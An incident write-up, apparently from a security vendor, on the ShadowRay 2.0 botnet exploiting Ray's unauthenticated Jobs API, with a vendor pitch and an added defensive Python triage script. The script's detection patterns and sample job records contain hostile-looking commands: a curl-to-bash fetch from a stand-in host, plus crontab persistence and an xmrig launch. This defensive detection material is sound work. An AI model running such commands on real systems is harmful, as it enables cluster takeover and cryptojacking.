ShadowRay 2.0: Global AI-Infrastructure Botnet via Ray Flaw
Key Takeaways
- The campaign exploits a critical remote-code-execution vulnerability in Ray (CVE-2023-48022) via its Jobs API — no authentication required when dashboards or job endpoints are exposed.
- Attackers operate under the alias IronErn440 and have weaponized legitimate orchestration and scheduling features in Ray to create a self-propagating GPU/CPU botnet.
- The scope is large — recent scans show over 230,000 Ray servers exposed to the internet, far more than the “few thousand” initially identified in 2024.
- Beyond cryptomining, attackers reportedly deploy multi-stage payloads for data exfiltration, credential theft, DDoS, and persistent remote-access backdoors using the same compromised infrastructure.
- The campaign demonstrates “AI attacking AI” — leveraging automated orchestration, payload generation (with possible use of LLMs), and cluster automation to scale attacks across hundreds of targets.
Summary
What began as a design-assumption vulnerability in an open-source AI orchestration framework has evolved into one of the most significant AI-infrastructure attacks to date. In November 2025, researchers from Oligo Security disclosed that threat actors had launched a global campaign — ShadowRay 2.0 — exploiting CVE-2023-48022 in Ray to hijack exposed clusters and turn them into a sprawling botnet.
Using unauthenticated Jobs APIs and dashboards, attackers submitted malicious jobs that executed arbitrary code. Once inside, they deployed cryptominers (using XMRig), set up persistence (cron jobs, malicious services), and used Ray’s scheduling and orchestration features to spread laterally across nodes and clusters. The campaign’s automation — including AI-generated payloads and DevOps-style distribution pipelines via GitLab and GitHub — reveals a chilling new paradigm: AI infrastructure used as attack infrastructure against AI itself. (The Hacker News)
Given the surge in the number of exposed Ray environments, and the ease of exploitation using only exposed public endpoints, this incident underlines urgent security failings across AI-infrastructure deployment practices.
What Happened: Attack Overview
- Vulnerability exploited: CVE-2023-48022 — Ray’s Jobs API lacks authentication if exposed. (SecurityWeek)
- Initial access: Attackers scanned for publicly exposed Ray dashboards or job endpoints, then submitted malicious jobs that ran Bash/Python payloads with cluster-level privileges.
- Payload & propagation: Once executed, the payload installed cryptominers (XMRig), established persistence (cron, services), and used Ray’s orchestration to pivot to other nodes or clusters — effectively turning the cluster into a self-propagating botnet. (BleepingComputer)
- Stealth tactics: To evade detection, the miners capped resource usage (~60% CPU/GPU), were disguised as legitimate services, killed competing miners, and hid GPU usage from monitoring dashboards.
- Adversary infrastructure: Attackers used public DevOps platforms (GitLab, GitHub) to host and deliver payloads; when one repo was taken down (Nov 5, 2025), they rapidly re-hosted on GitHub within days — showing operational agility.
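For defenders reviewing their own clusters, the behaviours listed above can be turned into a first-pass triage of submitted job records. This is an added example, not code from the original article, Oligo Security, or the Ray project; the rule patterns, the sample records, and the assumption that each record carries `submission_id`, `entrypoint` and `status` fields are illustrative.

```python
import re

# Rule name -> pattern, one per behaviour the article lists. The patterns are
# illustrative assumptions, not published indicators from the campaign.
RULES = {
    "remote-fetch-to-shell": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b"),
    "cron-persistence": re.compile(r"\bcrontab\b|/etc/cron"),
    "service-persistence": re.compile(r"\bsystemctl\s+(enable|start)\b|/etc/systemd/system"),
    "miner-binary": re.compile(r"xmrig", re.IGNORECASE),
    "kills-other-processes": re.compile(r"\b(pkill|killall)\b"),
}

# Constructed sample job records. The keys are assumed to match what a job
# listing export contains; every value below is made up for the example.
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_a1", "status": "SUCCEEDED",
     "entrypoint": "python train.py --epochs 10"},
    {"submission_id": "raysubmit_b2", "status": "RUNNING",
     "entrypoint": "bash -c 'curl -s https://payload.example/s.sh | bash'"},
    {"submission_id": "raysubmit_c3", "status": "RUNNING",
     "entrypoint": "sh -c 'pkill -f miner; crontab /tmp/.c; ./xmrig'"},
    {"submission_id": "raysubmit_d4", "status": "FAILED",
     "entrypoint": "python -m pytest tests/ && wget https://data.example/set.tgz"},
]


def triage(jobs):
    """Return [(submission_id, [rule names])] for jobs whose entrypoint
    matches any rule, most rule hits first."""
    findings = []
    for job in jobs:
        entrypoint = job.get("entrypoint") or ""
        hits = [name for name, rx in RULES.items() if rx.search(entrypoint)]
        if hits:
            findings.append((job.get("submission_id", "<unknown>"), hits))
    # Stable sort: jobs with equal hit counts keep submission order.
    findings.sort(key=lambda f: len(f[1]), reverse=True)
    return findings


if __name__ == "__main__":
    for submission_id, hits in triage(SAMPLE_JOBS):
        print(f"{submission_id}: {', '.join(hits)}")
```

A plain download with no pipe to a shell (the last sample record) is deliberately not flagged; matches are leads for review, not verdicts.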
Impact: Why It Matters
- Massive scale & scope: With hundreds of thousands of exposed Ray clusters globally, the attack surface is enormous and still growing, especially as AI adoption climbs in enterprises, research labs, and startups.
- Infrastructure as attack surface: Once just “compute,” GPU/AI clusters have become first-class targets — capable of cryptomining, data theft, DDoS or further lateral attacks across cloud environments.
- Cross-tenant and supply-chain risk: Shared infrastructure, cloud-hosted AI services, and poorly isolated clusters mean one compromised node could endanger many customers or clients.
- Ease of exploitation: Exploit requires minimal technical sophistication — unauthenticated API, public endpoint, simple job submission — making it accessible even to moderately skilled attackers.
- Stealth & persistence: Use of orchestration, resource-throttling, process masquerading, and automated tooling makes detection difficult, reducing the likelihood of timely remediation or containment.
ShadowRay 2.0 may be the first large-scale “AI-infrastructure vs AI-infrastructure” campaign — but it's unlikely the last.
PointGuard AI Perspective
This breach confirms a fundamental truth: securing AI infrastructure is just as important as securing models or data.
With PointGuard AI, organizations can defend against threats like ShadowRay by leveraging:
- Comprehensive infrastructure discovery & asset inventory — identifying all AI orchestration frameworks (Ray, clusters, dashboards, job endpoints) across cloud, on-prem, and hybrid environments
- Configuration posture checks & network-hardening enforcement — ensuring dashboards and APIs are never publicly exposed, enforcing authentication, firewall/VPC isolation, and least-privilege rules
- Runtime behavior monitoring & anomaly detection — flagging suspicious job submissions, unusual compute workloads, hidden miners, or lateral job propagation indicative of compromise
- Supply-chain / dependency risk management — treating orchestration frameworks and cluster configurations as part of the AI SBOM, ensuring updates, mitigations, and audit history are maintained
- Incident response & containment orchestration — rapid identification of affected clusters, isolation of compromised compute, credential revocation, and forensic analysis
For any organization running AI workloads at scale — especially with GPU clusters or distributed compute — ShadowRay 2.0 is a warning: if you treat infrastructure as generic cloud compute, you risk becoming part of the botnet.
Incident Scorecard Details
Total AISSI Score: 7.8 / 10
Criticality = 8, High — complete cluster takeover, potential data/model theft, cryptojacking, and persistent access.
Propagation = 8, Large — hundreds of thousands of exposed Ray clusters globally, active exploitation, self-spreading botnet.
Exploitability = 8, High — requires only public exposure and no authentication; trivially exploitable via job submission.
Supply Chain = 8, High — flaw lies in widely used open-source orchestration framework; many deployments remain unpatched or misconfigured.
Business Impact = 7, Broad — risk to compute costs, data security, model integrity, regulatory compliance, and reputational damage.
Sources
- Cyber Security News — New ShadowRay Attack Exploit Ray AI-Framework Vulnerability to Attack AI Systems (Nov 19, 2025)
- SecurityWeek — Two-Year-Old Ray AI Framework Flaw Exploited in Ongoing Campaign (Nov 19, 2025)
- The Hacker News — ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet (Nov 20, 2025)
- BleepingComputer — New ShadowRay attacks convert Ray clusters into crypto miners (Nov 18, 2025)
- eSecurity Planet — ShadowRay 2.0 Exploits Ray Vulnerability to Hijack AI Clusters (Nov 19, 2025)
